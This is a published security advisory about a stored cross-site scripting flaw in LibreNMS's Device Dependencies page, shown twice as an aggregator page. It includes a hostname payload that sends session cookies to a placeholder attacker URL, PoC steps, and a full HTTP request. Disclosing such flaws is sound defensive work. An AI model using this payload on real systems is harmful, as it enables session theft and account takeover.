Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-rwwc-2v8q-gc9v: LibreNMS has Stored Cross-site Scripting vulnerability in "Device Dependencies" feature

Summary

A Stored Cross-Site Scripting (XSS) vulnerability in the “Device Dependencies” feature allows authenticated users to inject arbitrary JavaScript through the device name (“hostname” parameter). This vulnerability can lead to the execution of malicious code in the context of other users’ sessions, potentially compromising their accounts and allowing unauthorized actions.

Details

The vulnerability occurs when creating a device within LibreNMS. An attacker can inject arbitrary JavaScript into the hostname parameter. This malicious script is then executed when another user visits the device dependencies page, resulting in an automatic redirect to a website controlled by the attacker. This redirect can be used to steal session cookies or perform other malicious actions.

For example, the following payload can be used to exploit the vulnerability: t'' autofocus onfocus="document.location='https://<attacker_url>/?c='+document.cookie"

When the device dependencies page is loaded, this payload triggers the JavaScript, causing the user’s browser to redirect to the attacker’s website with any non-httponly cookies in the URL.

The root cause of this vulnerability is the application’s failure to sanitize the row.hostname value before including it in the HTML output.

This is evident in the following line of code: https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/pages/device-dependencies.inc.php#L74

PoC

  1. Add a new device using the following payload for the hostname: t'' autofocus onfocus="document.location='https://<attacker_url>/?c='+document.cookie"
  2. Save the device.
  3. Navigate to the device dependencies page.
  4. Observe that the injected script executes, redirecting the user to the attacker’s website with any non-httponly cookies included in the URL.

Example Request:

POST /addhost HTTP/1.1
Host: <your_host>
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: <your_cookie>

_token=<your_token>&hostname=t%27%27+autofocus+onfocus%3D%22document.location%3D%27https%3A%2F%<attacker_url>%2F%3Fc%3D%27%2Bdocument.cookie%22&sysName=&hardware=&os=&os_id=&snmpver=v2c&port=&transport=udp&port_assoc_mode=ifIndex&community=&authlevel=noAuthNoPriv&authname=&authpass=&authalgo=SHA&cryptopass=&cryptoalgo=AES&force_add=on&Submit=

Impact

It could allow authenticated users to execute arbitrary JavaScript code in the context of other users’ sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.

ghsa
#xss#vulnerability#web#git#java#php#oauth#auth

Summary

A Stored Cross-Site Scripting (XSS) vulnerability in the “Device Dependencies” feature allows authenticated users to inject arbitrary JavaScript through the device name (“hostname” parameter). This vulnerability can lead to the execution of malicious code in the context of other users’ sessions, potentially compromising their accounts and allowing unauthorized actions.

Details

The vulnerability occurs when creating a device within LibreNMS. An attacker can inject arbitrary JavaScript into the hostname parameter. This malicious script is then executed when another user visits the device dependencies page, resulting in an automatic redirect to a website controlled by the attacker. This redirect can be used to steal session cookies or perform other malicious actions.

For example, the following payload can be used to exploit the vulnerability:
t’’ autofocus onfocus="document.location=’https://<attacker_url>/?c=’+document.cookie"

When the device dependencies page is loaded, this payload triggers the JavaScript, causing the user’s browser to redirect to the attacker’s website with any non-httponly cookies in the URL.

The root cause of this vulnerability is the application’s failure to sanitize the row.hostname value before including it in the HTML output.

This is evident in the following line of code:
https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/pages/device-dependencies.inc.php#L74

PoC

  1. Add a new device using the following payload for the hostname:
    t’’ autofocus onfocus="document.location=’https://<attacker_url>/?c=’+document.cookie"
  2. Save the device.
  3. Navigate to the device dependencies page.
  4. Observe that the injected script executes, redirecting the user to the attacker’s website with any non-httponly cookies included in the URL.

Example Request:

POST /addhost HTTP/1.1 Host: <your_host> X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: <your_cookie>

_token=<your_token>&hostname=t%27%27+autofocus+onfocus%3D%22document.location%3D%27https%3A%2F%<attacker_url>%2F%3Fc%3D%27%2Bdocument.cookie%22&sysName=&hardware=&os=&os_id=&snmpver=v2c&port=&transport=udp&port_assoc_mode=ifIndex&community=&authlevel=noAuthNoPriv&authname=&authpass=&authalgo=SHA&cryptopass=&cryptoalgo=AES&force_add=on&Submit=

Impact

It could allow authenticated users to execute arbitrary JavaScript code in the context of other users’ sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.

References

  • GHSA-rwwc-2v8q-gc9v
  • librenms/librenms@36b38a5
  • https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/pages/device-dependencies.inc.php#L74
  • https://nvd.nist.gov/vuln/detail/CVE-2024-47527

ghsa: Latest News

GHSA-4jwc-w2hc-78qv: Tonic has remotely exploitable denial of service vulnerability